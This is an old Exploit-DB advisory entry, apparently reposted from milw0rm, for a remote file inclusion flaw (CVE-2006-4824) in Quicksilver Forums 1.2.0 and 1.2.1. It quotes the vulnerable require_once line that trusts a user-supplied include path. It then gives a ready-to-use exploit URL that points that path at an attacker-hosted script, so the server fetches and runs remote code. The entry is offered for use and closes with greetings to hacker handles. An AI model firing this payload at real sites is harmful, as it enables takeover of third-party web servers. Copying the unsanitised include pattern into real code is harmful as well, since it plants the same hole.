Quicksilver Forums <= 1.2.1 set Remote File Include Vulnerability

2006-09-13T00:00:00
ID EDB-ID:2356
Type exploitdb
Reporter mdx
Modified 2006-09-13T00:00:00

Description

Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability. CVE-2006-4824. Webapps exploit for php platform

                                        
                                            ####################################################
#                                                  #
#           [ WWW.SecurityWall.orG ]               #
#                                                  #
####################################################

Quicksilver Forums [(v1.2.0)+(1.2.1)] (set[include_path]) Remote File Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################
[v1.2.0]+[v1.2.1]
Code: activeutil.php?

require_once $set['include_path'] . '/lib/bbcode.php';


Exploit:
http://www.site.com/[path]/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?

####################################################

Greetz: [Cyber-warrior TIM USERS] , Dreamlord , xoron , The_bat_hacker , redx , dipsomania , Kizil_alev, ElHaCKeR :=)
####################################################

# milw0rm.com [2006-09-13]